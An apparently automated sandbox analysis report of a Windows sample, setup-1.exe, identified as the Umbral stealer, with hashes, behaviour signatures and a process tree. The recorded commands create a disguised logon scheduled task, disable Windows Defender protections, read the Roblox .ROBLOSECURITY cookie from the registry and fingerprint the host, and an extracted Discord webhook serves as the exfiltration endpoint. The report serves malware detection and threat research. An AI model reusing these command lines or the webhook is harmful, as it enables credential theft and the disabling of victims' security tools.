Analysis

  • max time kernel
    4s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    29-02-2024 13:48

General

  • Target

    setup-1.exe

  • Size

    244KB

  • MD5

    88a46f6fad262c425ac411c1f9594c69

  • SHA1

    07a58a70278d223165ba22aee94863587ceb4057

  • SHA256

    b638a068653a1b5273d6a11c43d97c7cc3febdc3085243760ac9c57e04d35e10

  • SHA512

    730549619dd6e8847068c4f569b3d1f9d8b49162d85d8a8a6c4a4151f1a97590d7d59dc91e15497c5ce5d020d53385f8cb8de30e159d5f34718f26ace2272001

  • SSDEEP

    6144:epkye1kDlYpAoEjQnZkLdGDB6Hkn2cY3TwaRb7:kknCDSBEjEkLdM6HV3Ma

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1211276511907151963/KjUXY-OO5tQr3VnZNM1_1xmfhFv3JUJtYA090It15YMwQCWI8k2rOR5-d1J0h7UrcBe-

Signatures

  • Detect Umbral payload 5 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup-1.exe
    "C:\Users\Admin\AppData\Local\Temp\setup-1.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of WriteProcessMemory
    PID:3008
    • C:\Windows\system32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1684
    • C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe
      "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe"
        3⤵
        • Views/modifies file attributes
        PID:2416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe'
        3⤵
          PID:2456
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          3⤵
            PID:372
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            3⤵
              PID:2820
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              3⤵
                PID:896
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" os get Caption
                3⤵
                  PID:1092
                • C:\Windows\System32\Wbem\wmic.exe
                  "wmic.exe" computersystem get totalphysicalmemory
                  3⤵
                    PID:2944
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" csproduct get uuid
                    3⤵
                      PID:3048
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      3⤵
                        PID:1268
                      • C:\Windows\System32\Wbem\wmic.exe
                        "wmic" path win32_VideoController get name
                        3⤵
                        • Detects videocard installed
                        PID:1668
                      • C:\Windows\system32\cmd.exe
                        "cmd.exe" /c ping localhost && del /F /A h "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe" && pause
                        3⤵
                          PID:780
                          • C:\Windows\system32\PING.EXE
                            ping localhost
                            4⤵
                            • Runs ping.exe
                            PID:1564
                    • C:\Windows\system32\schtasks.exe
                      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe"
                      1⤵
                      • Creates scheduled task(s)
                      PID:2668

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe

                      Filesize

                      576KB

                      MD5

                      f235045929731b60e7ed7b46cea8eece

                      SHA1

                      9b7c2f9c33157682407bed8250e5151a6a5c1b0f

                      SHA256

                      6b51aafa5ab37e4c63b2ab475793cc616b5a5d91ae5fecea27137daf139d9bb2

                      SHA512

                      a482630b64a714cc50985b5381cd0767e597f3a991d15ba0b252c4d2222b1ed78ae36429bf32c23b1f422d9be81f558f4be3e85abae5a55084a83decdbf927e5

                    • C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe

                      Filesize

                      703KB

                      MD5

                      869304fea2ba3b13f001a7ef6febb5df

                      SHA1

                      62c2d9557bc09ed25f57a47a04d6409505f3664b

                      SHA256

                      1562dec1b422ef5727ba676225e2a5d38de84a1e45fd047765d817002ce8554b

                      SHA512

                      11d343dd80be969375a54b846a2487207a04c52a21e68e02b427e9879b462731677caf96638d69cad469863083c9a6268c393349a5bdf7de8343fe682b381b84

                    • C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe

                      Filesize

                      68KB

                      MD5

                      8298cf292b772dac968f4db3024b13f0

                      SHA1

                      ba92fb47222ba2c46755ca5d59d35907d8db5e63

                      SHA256

                      c82745eb82949500a7104ac86c3281d2415f90218309c6c0efe6c19a122b5a21

                      SHA512

                      a13a08eacdbb007341402e8d1f63a5fa39ce6b89c9a8d9bf452d03eadfde529b4986c5765d928df125df9db0d7b410e7b9995fdca6da9cadad74325e6b0f6d54

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                      Filesize

                      7KB

                      MD5

                      c30463fdb1e6b08adb2213e1bf1d1cc2

                      SHA1

                      2f9fb3ccfbf99032c9b0ebe0a67a4a88e7b2c530

                      SHA256

                      0c6c1540937384e22c161998521b77d57b28e521f3090dd0fe7839e31ab2ce00

                      SHA512

                      880a7a61a90f9cf0659022dc0cd21f4eb7fbf91b96f19e754d3da96971dbec39c08407ec2abad464fa8a3f258abfac1bb09ec51c23d372bceef5c2b15f3167f2

                    • memory/372-50-0x00000000027B0000-0x0000000002830000-memory.dmp

                      Filesize

                      512KB

                    • memory/372-52-0x00000000027B0000-0x0000000002830000-memory.dmp

                      Filesize

                      512KB

                    • memory/372-53-0x000007FEED070000-0x000007FEEDA0D000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/372-51-0x00000000027B0000-0x0000000002830000-memory.dmp

                      Filesize

                      512KB

                    • memory/372-49-0x00000000027B0000-0x0000000002830000-memory.dmp

                      Filesize

                      512KB

                    • memory/372-47-0x000007FEED070000-0x000007FEEDA0D000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/372-48-0x00000000027B0000-0x0000000002830000-memory.dmp

                      Filesize

                      512KB

                    • memory/372-46-0x000007FEED070000-0x000007FEEDA0D000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/372-45-0x00000000027A0000-0x00000000027A8000-memory.dmp

                      Filesize

                      32KB

                    • memory/372-44-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/896-82-0x0000000002970000-0x00000000029F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/896-83-0x0000000002970000-0x00000000029F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/896-81-0x000007FEED070000-0x000007FEEDA0D000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/896-84-0x0000000002970000-0x00000000029F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/896-86-0x0000000002970000-0x00000000029F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/896-85-0x000007FEED070000-0x000007FEEDA0D000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/896-87-0x000007FEED070000-0x000007FEEDA0D000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/1268-96-0x0000000001F40000-0x0000000001F48000-memory.dmp

                      Filesize

                      32KB

                    • memory/1268-99-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/1268-97-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/1268-98-0x0000000002840000-0x00000000028C0000-memory.dmp

                      Filesize

                      512KB

                    • memory/1268-103-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/1268-102-0x0000000002840000-0x00000000028C0000-memory.dmp

                      Filesize

                      512KB

                    • memory/1268-100-0x0000000002840000-0x00000000028C0000-memory.dmp

                      Filesize

                      512KB

                    • memory/1268-101-0x0000000002840000-0x00000000028C0000-memory.dmp

                      Filesize

                      512KB

                    • memory/2456-32-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2456-33-0x0000000002990000-0x0000000002A10000-memory.dmp

                      Filesize

                      512KB

                    • memory/2456-35-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2456-30-0x000000001B180000-0x000000001B462000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/2456-34-0x0000000002990000-0x0000000002A10000-memory.dmp

                      Filesize

                      512KB

                    • memory/2456-31-0x0000000002490000-0x0000000002498000-memory.dmp

                      Filesize

                      32KB

                    • memory/2456-36-0x0000000002990000-0x0000000002A10000-memory.dmp

                      Filesize

                      512KB

                    • memory/2456-37-0x0000000002990000-0x0000000002A10000-memory.dmp

                      Filesize

                      512KB

                    • memory/2456-38-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2544-25-0x000000001B2A0000-0x000000001B320000-memory.dmp

                      Filesize

                      512KB

                    • memory/2544-57-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/2544-107-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/2544-24-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/2544-73-0x000000001B2A0000-0x000000001B320000-memory.dmp

                      Filesize

                      512KB

                    • memory/2544-23-0x0000000001240000-0x0000000001280000-memory.dmp

                      Filesize

                      256KB

                    • memory/2820-70-0x0000000002670000-0x00000000026F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/2820-69-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2820-71-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2820-72-0x0000000002670000-0x00000000026F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/2820-74-0x0000000002670000-0x00000000026F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/2820-75-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/3008-0-0x0000000000380000-0x00000000003C4000-memory.dmp

                      Filesize

                      272KB

                    • memory/3008-55-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/3008-2-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

                      Filesize

                      9.9MB